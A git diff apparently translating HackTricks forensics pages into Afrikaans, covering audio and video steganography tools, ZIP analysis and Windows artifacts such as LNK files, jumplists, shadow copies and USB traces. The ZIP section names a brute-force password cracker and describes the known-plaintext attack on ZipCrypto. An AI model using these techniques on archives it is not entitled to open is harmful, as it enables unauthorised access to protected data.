[**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
-**Audio and video file manipulation** is a staple in **CTF forensics challenges**, leveraging **steganography** and metadata analysis to hide or reveal secret messages. Tools such as **[mediainfo](https://mediaarea.net/en/MediaInfo)** and **`exiftool`** are essential for inspecting file metadata and identifying content types. +**Audio- en videobestandmanipulasie** is 'n kenmerkende aspek in **CTF-forensiese uitdagings**, wat gebruik maak van **steganografie** en metadata-analise om geheime boodskappe te verberg of te onthul. Gereedskap soos **[mediainfo](https://mediaarea.net/en/MediaInfo)** en **`exiftool`** is noodsaaklik vir die ondersoek van lêermetadata en die identifisering van inhoudstipes. -For audio challenges, **[Audacity](http://www.audacityteam.org/)** stands out as a premier tool for viewing waveforms and analyzing spectrograms, essential for uncovering text encoded in audio. **[Sonic Visualiser](http://www.sonicvisualiser.org/)** is highly recommended for detailed spectrogram analysis. **Audacity** allows for audio manipulation like slowing down or reversing tracks to detect hidden messages. **[Sox](http://sox.sourceforge.net/)**, a command-line utility, excels in converting and editing audio files. +Vir klankuitdagings steek **[Audacity](http://www.audacityteam.org/)** uit as 'n voorste gereedskap vir die besigtiging van golfvorme en die analise van spektrogramme, wat noodsaaklik is vir die ontdekking van teks wat in klank gekodeer is. **[Sonic Visualiser](http://www.sonicvisualiser.org/)** word sterk aanbeveel vir gedetailleerde spektrogramanalise. **Audacity** maak klankmanipulasie soos vertraging of omkeer van spore moontlik om verborge boodskappe op te spoor. **[Sox](http://sox.sourceforge.net/)**, 'n opdraglyn-hulpprogram, blink uit in die omskakeling en redigering van klanklêers. -**Least Significant Bits (LSB)** manipulation is a common technique in audio and video steganography, exploiting the fixed-size chunks of media files to embed data discreetly. **[Multimon-ng](http://tools.kali.org/wireless-attacks/multimon-ng)** is useful for decoding messages hidden as **DTMF tones** or **Morse code**. +**Least Significant Bits (LSB)**-manipulasie is 'n algemene tegniek in klank- en videosteganografie, wat gebruik maak van die vaste-grootte brokkies van mediabestande om data heimlik in te bed. **[Multimon-ng](http://tools.kali.org/wireless-attacks/multimon-ng)** is nuttig vir die ontsluiting van boodskappe wat versteek is as **DTMF-tone** of **Morsekode**. -Video challenges often involve container formats that bundle audio and video streams. **[FFmpeg](http://ffmpeg.org/)** is the go-to for analyzing and manipulating these formats, capable of de-multiplexing and playing back content. For developers, **[ffmpy](http://ffmpy.readthedocs.io/en/latest/examples.html)** integrates FFmpeg's capabilities into Python for advanced scriptable interactions. +Videouitdagings behels dikwels houerformate wat klank- en videostrome saambind. **[FFmpeg](http://ffmpeg.org/)** is die go-to-gereedskap vir die analise en manipulasie van hierdie formate, wat in staat is om inhoud te demultipleks en af te speel. Vir ontwikkelaars integreer **[ffmpy](http://ffmpy.readthedocs.io/en/latest/examples.html)** FFmpeg se vermoëns in Python vir gevorderde skriptbare interaksies. -This array of tools underscores the versatility required in CTF challenges, where participants must employ a broad spectrum of analysis and manipulation techniques to uncover hidden data within audio and video files. +Hierdie verskeidenheid gereedskap beklemtoon die veelsydigheid wat vereis word in CTF-uitdagings, waar deelnemers 'n breë spektrum van analise- en manipulasietegnieke moet gebruik om verborge data binne klank- en videobestande te ontbloot. -## References +## Verwysings * [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
- - diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md index 16b905ce3..a3c42109c 100644 --- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md +++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md @@ -1,44 +1,44 @@ -# ZIPs tricks +# ZIP-truuks
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSKRIPSIEPLANNE**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
-**Command-line tools** for managing **zip files** are essential for diagnosing, repairing, and cracking zip files. Here are some key utilities: +**Opdraglynhulpmiddels** vir die bestuur van **zip-lêers** is noodsaaklik vir die diagnose, herstel en kraak van zip-lêers. Hier is 'n paar sleutelhulpprogramme: -- **`unzip`**: Reveals why a zip file may not decompress. -- **`zipdetails -v`**: Offers detailed analysis of zip file format fields. -- **`zipinfo`**: Lists contents of a zip file without extracting them. -- **`zip -F input.zip --out output.zip`** and **`zip -FF input.zip --out output.zip`**: Try to repair corrupted zip files. -- **[fcrackzip](https://github.com/hyc/fcrackzip)**: A tool for brute-force cracking of zip passwords, effective for passwords up to around 7 characters. +- **`unzip`**: Onthul waarom 'n zip-lêer nie gedekomprimeer kan word nie. +- **`zipdetails -v`**: Bied 'n gedetailleerde analise van die velds van die zip-lêerformaat. +- **`zipinfo`**: Lys die inhoud van 'n zip-lêer sonder om dit uit te pak. +- **`zip -F input.zip --out output.zip`** en **`zip -FF input.zip --out output.zip`**: Probeer om beskadigde zip-lêers te herstel. +- **[fcrackzip](https://github.com/hyc/fcrackzip)**: 'n Hulpmiddel vir bruto-kragkraak van zip-wagwoorde, effektief vir wagwoorde tot ongeveer 7 karakters. -The [Zip file format specification](https://pkware.cachefly.net/webdocs/casestudies/APPNOTE.TXT) provides comprehensive details on the structure and standards of zip files. +Die [Zip-lêerformaat spesifikasie](https://pkware.cachefly.net/webdocs/casestudies/APPNOTE.TXT) bied omvattende besonderhede oor die struktuur en standaarde van zip-lêers. -It's crucial to note that password-protected zip files **do not encrypt filenames or file sizes** within, a security flaw not shared with RAR or 7z files which encrypt this information. Furthermore, zip files encrypted with the older ZipCrypto method are vulnerable to a **plaintext attack** if an unencrypted copy of a compressed file is available. This attack leverages the known content to crack the zip's password, a vulnerability detailed in [HackThis's article](https://www.hackthis.co.uk/articles/known-plaintext-attack-cracking-zip-files) and further explained in [this academic paper](https://www.cs.auckland.ac.nz/\~mike/zipattacks.pdf). However, zip files secured with **AES-256** encryption are immune to this plaintext attack, showcasing the importance of choosing secure encryption methods for sensitive data. +Dit is belangrik om daarop te let dat wagwoord-beskermde zip-lêers **nie lêernaam of lêergroottes versleutel nie**, 'n veiligheidsgebrek wat nie gedeel word met RAR- of 7z-lêers wat hierdie inligting versleutel nie. Verder is zip-lêers wat met die ouer ZipCrypto-metode versleutel is, vatbaar vir 'n **platte tekst-aanval** as 'n onversleutelde kopie van 'n saamgedrukte lêer beskikbaar is. Hierdie aanval maak gebruik van die bekende inhoud om die wagwoord van die zip te kraak, 'n kwesbaarheid wat in [HackThis se artikel](https://www.hackthis.co.uk/articles/known-plaintext-attack-cracking-zip-files) beskryf word en verder verduidelik word in [hierdie akademiese artikel](https://www.cs.auckland.ac.nz/\~mike/zipattacks.pdf). Tog is zip-lêers wat met **AES-256**-versleuteling beveilig is, immuun teen hierdie platte tekst-aanval, wat die belangrikheid van die keuse van veilige versleutelingsmetodes vir sensitiewe data beklemtoon. -## References +## Verwysings * [https://michael-myers.github.io/blog/categories/ctf/](https://michael-myers.github.io/blog/categories/ctf/)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSKRIPSIEPLANNE**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
diff --git a/forensics/basic-forensic-methodology/windows-forensics/README.md b/forensics/basic-forensic-methodology/windows-forensics/README.md index 2b8d2400b..214f6f774 100644 --- a/forensics/basic-forensic-methodology/windows-forensics/README.md +++ b/forensics/basic-forensic-methodology/windows-forensics/README.md @@ -1,526 +1,494 @@ -# Windows Artifacts +# Windows Artefakte -## Windows Artifacts +## Windows Artefakte
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Generic Windows Artifacts +## Generiese Windows Artefakte -### Windows 10 Notifications +### Windows 10 Kennisgewings -In the path `\Users\\AppData\Local\Microsoft\Windows\Notifications` you can find the database `appdb.dat` (before Windows anniversary) or `wpndatabase.db` (after Windows Anniversary). +In die pad `\Users\\AppData\Local\Microsoft\Windows\Notifications` kan jy die databasis `appdb.dat` (voor Windows-verjaarsdag) of `wpndatabase.db` (na Windows-verjaarsdag) vind. -Inside this SQLite database, you can find the `Notification` table with all the notifications (in XML format) that may contain interesting data. +Binne hierdie SQLite-databasis kan jy die `Notification`-tabel vind met al die kennisgewings (in XML-formaat) wat moontlik interessante data kan bevat. -### Timeline +### Tydlyn -Timeline is a Windows characteristic that provides **chronological history** of web pages visited, edited documents, and executed applications. +Tydlyn is 'n Windows-kenmerk wat 'n **chronologiese geskiedenis** van besoekte webbladsye, bewerkte dokumente en uitgevoerde toepassings bied. -The database resides in the path `\Users\\AppData\Local\ConnectedDevicesPlatform\\ActivitiesCache.db`. This database can be opened with an SQLite tool or with the tool [**WxTCmd**](https://github.com/EricZimmerman/WxTCmd) **which generates 2 files that can be opened with the tool** [**TimeLine Explorer**](https://ericzimmerman.github.io/#!index.md). +Die databasis bly in die pad `\Users\\AppData\Local\ConnectedDevicesPlatform\\ActivitiesCache.db`. Hierdie databasis kan geopen word met 'n SQLite-hulpmiddel of met die hulpmiddel [**WxTCmd**](https://github.com/EricZimmerman/WxTCmd) **wat 2 lêers genereer wat geopen kan word met die hulpmiddel** [**TimeLine Explorer**](https://ericzimmerman.github.io/#!index.md). -### ADS (Alternate Data Streams) +### ADS (Alternatiewe Datastrome) -Files downloaded may contain the **ADS Zone.Identifier** indicating **how** it was **downloaded** from the intranet, internet, etc. Some software (like browsers) usually put even **more** **information** like the **URL** from where the file was downloaded. +Gedownloade lêers kan die **ADS Zone.Identifier** bevat wat aandui **hoe** dit van die intranet, internet, ens. afgelaai is. Sommige sagteware (soos webblaaier) plaas gewoonlik selfs **meer** **inligting** soos die **URL** waarvandaan die lêer afgelaai is. -## **File Backups** +## **Lêerback-ups** -### Recycle Bin +### Herwinbin -In Vista/Win7/Win8/Win10 the **Recycle Bin** can be found in the folder **`$Recycle.bin`** in the root of the drive (`C:\$Recycle.bin`).\ -When a file is deleted in this folder 2 specific files are created: +In Vista/Win7/Win8/Win10 kan die **Herwinbin** in die **`$Recycle.bin`**-map in die hoof van die aandrywing (`C:\$Recycle.bin`) gevind word.\ +Wanneer 'n lêer in hierdie map uitgevee word, word 2 spesifieke lêers geskep: -* `$I{id}`: File information (date of when it was deleted} -* `$R{id}`: Content of the file +* `$I{id}`: Lêerinligting (datum van uitvee} +* `$R{id}`: Inhoud van die lêer ![](<../../../.gitbook/assets/image (486).png>) -Having these files you can use the tool [**Rifiuti**](https://github.com/abelcheung/rifiuti2) to get the original address of the deleted files and the date it was deleted (use `rifiuti-vista.exe` for Vista – Win10). - +Met hierdie lêers kan jy die hulpmiddel [**Rifiuti**](https://github.com/abelcheung/rifiuti2) gebruik om die oorspronklike adres van die uitgevee lêers en die datum waarop dit uitgevee is, te kry (gebruik `rifiuti-vista.exe` vir Vista - Win10). ``` .\rifiuti-vista.exe C:\Users\student\Desktop\Recycle ``` - ![](<../../../.gitbook/assets/image (495) (1) (1) (1).png>) ### Volume Shadow Copies -Shadow Copy is a technology included in Microsoft Windows that can create **backup copies** or snapshots of computer files or volumes, even when they are in use. +Shadow Copy is 'n tegnologie wat ingesluit is in Microsoft Windows wat **back-up kopieë** of afskrifte van rekenaar lêers of volumes kan skep, selfs wanneer hulle in gebruik is. -These backups are usually located in the `\System Volume Information` from the root of the file system and the name is composed of **UIDs** shown in the following image: +Hierdie rugsteun kopieë is gewoonlik geleë in die `\System Volume Information` vanaf die wortel van die lêersisteem en die naam bestaan uit **UIDs** soos getoon in die volgende prentjie: ![](<../../../.gitbook/assets/image (520).png>) -Mounting the forensics image with the **ArsenalImageMounter**, the tool [**ShadowCopyView**](https://www.nirsoft.net/utils/shadow\_copy\_view.html) can be used to inspect a shadow copy and even **extract the files** from the shadow copy backups. +Deur die forensiese beeld te monteer met die **ArsenalImageMounter**, kan die instrument [**ShadowCopyView**](https://www.nirsoft.net/utils/shadow\_copy\_view.html) gebruik word om 'n skadukopie te ondersoek en selfs die lêers uit die skadukopie-rugsteunkopieë te **onttrek**. ![](<../../../.gitbook/assets/image (521).png>) -The registry entry `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\BackupRestore` contains the files and keys **to not backup**: +Die registerinskrywing `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\BackupRestore` bevat die lêers en sleutels **wat nie rugsteunkopieë moet wees nie**: ![](<../../../.gitbook/assets/image (522).png>) -The registry `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VSS` also contains configuration information about the `Volume Shadow Copies`. +Die register `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VSS` bevat ook konfigurasie-inligting oor die `Volume Shadow Copies`. -### Office AutoSaved Files +### Office AutoSaved-lêers -You can find the office autosaved files in: `C:\Usuarios\\AppData\Roaming\Microsoft{Excel|Word|Powerpoint}\` +Jy kan die kantoor outomatiese gestoorde lêers vind in: `C:\Usuarios\\AppData\Roaming\Microsoft{Excel|Word|Powerpoint}\` ## Shell Items -A shell item is an item that contains information about how to access another file. +'n Skulpunt is 'n item wat inligting bevat oor hoe om toegang tot 'n ander lêer te verkry. -### Recent Documents (LNK) +### Onlangse Dokumente (LNK) -Windows **automatically** **creates** these **shortcuts** when the user **open, uses or creates a file** in: +Windows skep **outomaties** hierdie **kortpaaie** wanneer die gebruiker 'n lêer **open, gebruik of skep** in: * Win7-Win10: `C:\Users\\AppData\Roaming\Microsoft\Windows\Recent\` * Office: `C:\Users\\AppData\Roaming\Microsoft\Office\Recent\` -When a folder is created, a link to the folder, to the parent folder, and the grandparent folder is also created. +Wanneer 'n vouer geskep word, word 'n skakel na die vouer, na die ouervouer en die ouergrootouervouer ook geskep. -These automatically created link files **contain information about the origin** like if it's a **file** **or** a **folder**, **MAC** **times** of that file, **volume information** of where is the file stored and **folder of the target file**. This information can be useful to recover those files in case they were removed. +Hierdie outomaties geskepte skakel lêers **bevat inligting oor die oorsprong** soos of dit 'n **lêer** **of** 'n **vouer** is, **MAC** **tye** van daardie lêer, **volume-inligting** van waar die lêer gestoor word en die **vouer van die teikenvouer**. Hierdie inligting kan nuttig wees om daardie lêers te herstel in die geval dat hulle verwyder is. -Also, the **date created of the link** file is the first **time** the original file was **first** **used** and the **date** **modified** of the link file is the **last** **time** the origin file was used. +Verder is die **skepdatum van die skakel** lêer die eerste **keer** wat die oorspronklike lêer **eerste** **gebruik** is en die **gewysigde datum** van die skakel lêer is die **laaste** **keer** wat die oorspronklike lêer gebruik is. -To inspect these files you can use [**LinkParser**](http://4discovery.com/our-tools/). +Om hierdie lêers te ondersoek, kan jy die instrument [**LinkParser**](http://4discovery.com/our-tools/) gebruik. -In this tools you will find **2 sets** of timestamps: +In hierdie instrument sal jy **2 stelle** tydmerke vind: -* **First Set:** - 1. FileModifiedDate - 2. FileAccessDate - 3. FileCreationDate -* **Second Set:** - 1. LinkModifiedDate - 2. LinkAccessDate - 3. LinkCreationDate. +* **Eerste Stel:** +1. FileModifiedDate +2. FileAccessDate +3. FileCreationDate +* **Tweede Stel:** +1. LinkModifiedDate +2. LinkAccessDate +3. LinkCreationDate. -The first set of timestamp references the **timestamps of the file itself**. The second set references the **timestamps of the linked file**. - -You can get the same information running the Windows CLI tool: [**LECmd.exe**](https://github.com/EricZimmerman/LECmd) +Die eerste stel tydmerke verwys na die **tydmerke van die lêer self**. Die tweede stel verwys na die **tydmerke van die gekoppelde lêer**. +Jy kan dieselfde inligting kry deur die Windows CLI-instrument [**LECmd.exe**](https://github.com/EricZimmerman/LECmd) uit te voer. ``` LECmd.exe -d C:\Users\student\Desktop\LNKs --csv C:\Users\student\Desktop\LNKs ``` +In hierdie geval sal die inligting binne 'n CSV-lêer gestoor word. -In this case, the information is going to be saved inside a CSV file. +### Springlyste -### Jumplists +Dit is die onlangse lêers wat per toepassing aangedui word. Dit is die lys van onlangse lêers wat deur 'n toepassing gebruik word en waartoe jy toegang kan verkry op elke toepassing. Hulle kan outomaties geskep word of aangepas wees. -These are the recent files that are indicated per application. It's the list of **recent files used by an application** that you can access on each application. They can be created **automatically or be custom**. +Die outomaties geskepte springlyste word gestoor in `C:\Users\{gebruikersnaam}\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\`. Die springlyste word genoem volgens die formaat `{id}.autmaticDestinations-ms` waar die aanvanklike ID die ID van die toepassing is. -The **jumplists** created automatically are stored in `C:\Users\{username}\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\`. The jumplists are named following the format `{id}.autmaticDestinations-ms` where the initial ID is the ID of the application. +Die aangepaste springlyste word gestoor in `C:\Users\{gebruikersnaam}\AppData\Roaming\Microsoft\Windows\Recent\CustomDestination\` en hulle word gewoonlik deur die toepassing geskep omdat iets belangrik met die lêer gebeur het (dalk as gunsteling gemerk). -The custom jumplists are stored in `C:\Users\{username}\AppData\Roaming\Microsoft\Windows\Recent\CustomDestination\` and they are created by the application usually because something **important** has happened with the file (maybe marked as favorite) +Die **geskepte tyd** van enige springlys dui die **eerste keer aan dat die lêer geopen is** en die **veranderde tyd die laaste keer**. -The **created time** of any jumplist indicates the **the first time the file was accessed** and the **modified time the last time**. - -You can inspect the jumplists using [**JumplistExplorer**](https://ericzimmerman.github.io/#!index.md). +Jy kan die springlyste ondersoek met behulp van [**JumplistExplorer**](https://ericzimmerman.github.io/#!index.md). ![](<../../../.gitbook/assets/image (474).png>) -(_Note that the timestamps provided by JumplistExplorer are related to the jumplist file itself_) +(_Let daarop dat die tye wat deur JumplistExplorer verskaf word, verband hou met die springlys-lêer self_) ### Shellbags -[**Follow this link to learn what are the shellbags.**](interesting-windows-registry-keys.md#shellbags) +[**Volg hierdie skakel om uit te vind wat die shellbags is.**](interesting-windows-registry-keys.md#shellbags) -## Use of Windows USBs +## Gebruik van Windows USB's -It's possible to identify that a USB device was used thanks to the creation of: +Dit is moontlik om te identifiseer dat 'n USB-toestel gebruik is as gevolg van die skepping van: -* Windows Recent Folder -* Microsoft Office Recent Folder -* Jumplists +* Windows Onlangse Gids +* Microsoft Office Onlangse Gids +* Springlyste -Note that some LNK file instead of pointing to the original path, points to the WPDNSE folder: +Let daarop dat sommige LNK-lêers in plaas van na die oorspronklike pad te verwys, na die WPDNSE-gids verwys: ![](<../../../.gitbook/assets/image (476).png>) -The files in the folder WPDNSE are a copy of the original ones, then won't survive a restart of the PC and the GUID is taken from a shellbag. +Die lêers in die WPDNSE-gids is 'n kopie van die oorspronklike lêers en sal dus nie oorleef na 'n herlaai van die rekenaar nie, en die GUID word geneem uit 'n shellbag. -### Registry Information +### Registerinligting -[Check this page to learn](interesting-windows-registry-keys.md#usb-information) which registry keys contain interesting information about USB connected devices. +[Kyk na hierdie bladsy om uit te vind](interesting-windows-registry-keys.md#usb-information) watter registerkodes interessante inligting oor USB-aangeslote toestelle bevat. ### setupapi -Check the file `C:\Windows\inf\setupapi.dev.log` to get the timestamps about when the USB connection was produced (search for `Section start`). +Kyk na die lêer `C:\Windows\inf\setupapi.dev.log` om die tye te kry wanneer die USB-aansluiting plaasgevind het (soek na `Section start`). -![](<../../../.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (14).png>) +![](<../../../.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (14).png>) ### USB Detective -[**USBDetective**](https://usbdetective.com) can be used to obtain information about the USB devices that have been connected to an image. +[**USBDetective**](https://usbdetective.com) kan gebruik word om inligting te verkry oor die USB-toestelle wat aan 'n beeld gekoppel was. ![](<../../../.gitbook/assets/image (483).png>) -### Plug and Play Cleanup +### Inprop en Speel Skoonmaak -The scheduled task known as 'Plug and Play Cleanup' is primarily designed for the removal of outdated driver versions. Contrary to its specified purpose of retaining the latest driver package version, online sources suggest it also targets drivers that have been inactive for 30 days. Consequently, drivers for removable devices not connected in the past 30 days may be subject to deletion. +Die geskeduleerde taak wat bekend staan as 'Inprop en Speel Skoonmaak' is primêr ontwerp vir die verwydering van verouderde bestuurdersweergawes. In teenstelling met sy gespesifiseerde doelwit om die nuutste bestuurderspakketweergawe te behou, dui aanlynbronne daarop dat dit ook mik op bestuurders wat vir 30 dae onaktief was. Gevolglik kan bestuurders vir verwyderbare toestelle wat nie in die afgelope 30 dae aangesluit is nie, onderhewig wees aan uitwissing. -The task is located at the following path: +Die taak is geleë by die volgende pad: `C:\Windows\System32\Tasks\Microsoft\Windows\Plug and Play\Plug and Play Cleanup`. -A screenshot depicting the task's content is provided: +'n Skermkiekie wat die inhoud van die taak uitbeeld, word voorsien: ![](https://2.bp.blogspot.com/-wqYubtuR_W8/W19bV5S9XyI/AAAAAAAANhU/OHsBDEvjqmg9ayzdNwJ4y2DKZnhCdwSMgCLcBGAs/s1600/xml.png) -**Key Components and Settings of the Task:** -- **pnpclean.dll**: This DLL is responsible for the actual cleanup process. -- **UseUnifiedSchedulingEngine**: Set to `TRUE`, indicating the use of the generic task scheduling engine. +**Kernkomponente en instellings van die taak:** +- **pnpclean.dll**: Hierdie DLL is verantwoordelik vir die werklike skoonmaakproses. +- **UseUnifiedSchedulingEngine**: Gestel op `TRUE`, wat dui op die gebruik van die generiese taakbeplanning-enjin. - **MaintenanceSettings**: - - **Period ('P1M')**: Directs the Task Scheduler to initiate the cleanup task monthly during regular Automatic maintenance. - - **Deadline ('P2M')**: Instructs the Task Scheduler, if the task fails for two consecutive months, to execute the task during emergency Automatic maintenance. +- **Period ('P1M')**: Stuur die Taakbeplanner om die skoonmaaktaak maandeliks tydens gereelde outomatiese instandhouding te begin. +- **Deadline ('P2M')**: Instrueer die Taakbeplanner, as die taak vir twee opeenvolgende maande misluk, om die taak tydens noodgevalle outomatiese instandhouding uit te voer. -This configuration ensures regular maintenance and cleanup of drivers, with provisions for reattempting the task in case of consecutive failures. +Hierdie konfigurasie verseker gereelde instandhouding en skoonmaak van bestuurders, met voorsiening vir herpoging van die taak in geval van opeenvolgende mislukkings. -**For more information check:** [**https://blog.1234n6.com/2018/07/windows-plug-and-play-cleanup.html**](https://blog.1234n6.com/2018/07/windows-plug-and-play-cleanup.html) +**Vir meer inligting, kyk na:** [**https://blog.1234n6.com/2018/07/windows-plug-and-play-cleanup.html**](https://blog.1234n6.com/2018/07/windows-plug-and-play-cleanup.html) -## Emails +## E-posse -Emails contain **2 interesting parts: The headers and the content** of the email. In the **headers** you can find information like: +E-posse bevat **2 interessante 